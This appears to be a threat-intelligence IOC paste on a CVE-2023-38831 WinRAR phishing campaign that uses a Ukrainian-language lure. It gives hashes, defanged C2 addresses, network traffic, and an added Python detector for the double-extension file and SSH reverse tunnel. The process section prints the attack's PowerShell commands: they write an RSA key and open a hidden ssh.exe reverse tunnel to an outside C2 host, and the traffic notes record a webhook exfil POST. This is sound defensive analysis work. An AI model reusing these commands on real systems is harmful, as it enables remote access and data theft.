#IOC #OptiData #VR #RAR #202338831 #SSH #CMD #Powershell
https://pastebin.com/2FvjfiEs
previous_contact:
https://pastebin.com/APaRNDHd
FAQ:
https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/
attack_vector
--------------
email attachment .RAR (CVE-2023-38831 exploit) > .pdf .cmd > powershell > ssh > exfil
# # # # # # # #
email_headers
# # # # # # # #
Received: from 185_ .158_ .164_ .73
Received: from 185_ .195_ .19_ .196
From: jie_ .lin_ .wang_ @feber_ -co_ .com
Date: Mon, 11 Sep 2023 10:02:53 +0300
Subject: Updated: Нові індикатори кіберзагроз   [Ukrainian: "New cyber threat indicators"]
# # # # # # # #
files
# # # # # # # #
SHA-256 072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7
File name IOC_09_11.rar [ WinRAR CVE-2023-38831 ]
File size 234.38 KB (240000 bytes)
SHA-256 91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a
File name IOC_09_11.pdf .cmd
File size 6.74 KB (6901 bytes)
SHA-256 b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6
File name IOC_09_11.pdf
File size 261.03 KB (267296 bytes)
# # # # # # # #
activity
# # # # # # # #
PL_SCR email_attach
C2 46.4.105{ .116
216.66.35{ .145
netwrk
--------------
216.66.35{ .145 443 TCP 49301 → 443 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1
46.4.105{ .116 webhook{ .site 80 HTTP POST /e2831741-d8c8-4971-9464-e52d34f9d611 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
comp
--------------
ssh.exe 1316 TCP 216.66.35{ .145 443 ESTABLISHED
proc
--------------
C:\Program Files\WinRAR\WinRAR.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\support\AppData\Local\Temp\Rar$DIa3472.25027\IOC_09_11.pdf .cmd" "
C:\Program Files\WinRAR\WinRAR.exe e -ibck "IOC_09_11.rar" *.* C:\Users\support\AppData\Local\Temp\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "Set-Content -Path \"$($env:LOCALAPPDATA)\\Temp\\rsakey\" -Value \"-----BEGIN RSA ....
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$port=get-random -Minimum 10760 -Maximum 11290;start-process ssh.exe -windowstyle Hidden -ArgumentList \"-N -p443 root@216.66.35{ .145 -R 216.66.35{ .145:$port -i $($env:LOCALAPPDATA)\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no\" -PassThru"
C:\Program Files (x86)\OpenSSH\ssh.exe -N -p443 root@216.66.35{ .145 -R 216.66.35{ .145:11146 -i C:\Users\support\AppData\Local\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand ...
C:\Windows\system32\timeout.exe 3
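A detection pass over the process tree above, as an added example that is not part of this paste: it flags the CVE-2023-38831 tell-tale (a "<decoy>.pdf .cmd" file launched from WinRAR's Rar$ temp directory) and the ssh.exe reverse tunnel started with host-key checking disabled. The sample command lines are constructed from the proc section, with the C2 address replaced by a TEST-NET placeholder.

```python
import re

# Constructed sample process-creation command lines. Entries 0-2 reproduce the
# chain recorded in this paste; the C2 host is replaced by a TEST-NET placeholder
# (203.0.113.10) and entry 3 is a benign control that opens a real PDF.
C2_PLACEHOLDER = "203.0.113.10"
SAMPLE_CMDLINES = [
    r'C:\Program Files\WinRAR\WinRAR.exe e -ibck "IOC_09_11.rar" *.* C:\Users\support\AppData\Local\Temp' + "\\",
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\support\AppData\Local\Temp\Rar$DIa3472.25027\IOC_09_11.pdf .cmd" "',
    r'C:\Program Files (x86)\OpenSSH\ssh.exe -N -p443 root@' + C2_PLACEHOLDER + ' -R ' + C2_PLACEHOLDER
    + r':11146 -i C:\Users\support\AppData\Local\Temp\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no',
    r'C:\Windows\system32\notepad.exe C:\Users\support\Documents\IOC_09_11.pdf',
]

# CVE-2023-38831: WinRAR extracts "<decoy>.<docext> .<scriptext>" into its Rar$ temp
# directory and launches the script when the user opens the decoy. The single space
# before the real extension is the tell-tale; a plain double extension does not match.
RAR_DOUBLE_EXT = re.compile(
    r'\\Rar\$[^\\"]+\\[^\\"]+\.(?:pdf|doc|docx|xls|xlsx|jpg|png|txt) \.(?:cmd|bat|exe|vbs|js|ps1)\b',
    re.IGNORECASE,
)
SSH_EXE = re.compile(r'\bssh\.exe\b', re.IGNORECASE)
SSH_REMOTE_FORWARD = re.compile(r'(?:^|\s)-R\s+\S+:\d+')  # -R <host>:<port> reverse tunnel


def classify(cmdline: str) -> list[str]:
    """Return the names of the detections that fire on one process command line."""
    hits = []
    if RAR_DOUBLE_EXT.search(cmdline):
        hits.append("winrar_cve_2023_38831_double_extension")
    if SSH_EXE.search(cmdline) and SSH_REMOTE_FORWARD.search(cmdline):
        # -R from an interactive workstation is a reverse tunnel into the host; with
        # StrictHostKeyChecking=no the client accepts whatever server answers.
        hits.append("ssh_reverse_tunnel")
        if "StrictHostKeyChecking=no" in cmdline:
            hits.append("ssh_hostkey_check_disabled")
    return hits


def scan(cmdlines) -> dict[int, list[str]]:
    """Map each offending line index to its detections; clean lines are omitted."""
    return {i: h for i, line in enumerate(cmdlines) if (h := classify(line))}


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_CMDLINES).items():
        print(idx, names)
```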
persist
--------------
n/a
drop
--------------
%temp%\Rar$DIa3472.25027\IOC_09_11.pdf
%temp%\Rar$DIa3472.25027\IOC_09_11.pdf .cmd
C:\Users\support\.ssh\known_hosts
%temp%\rsakey
# # # # # # # #
additional info
# # # # # # # #
# # # # # # # #
VT & Intezer
# # # # # # # #
https://www.virustotal.com/gui/file/072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7/details
https://www.virustotal.com/gui/file/91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a/details
https://analyze.intezer.com/analyses/f32a47c7-333b-4b4e-9b69-14ea0378c083
https://www.virustotal.com/gui/file/b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6/details
VR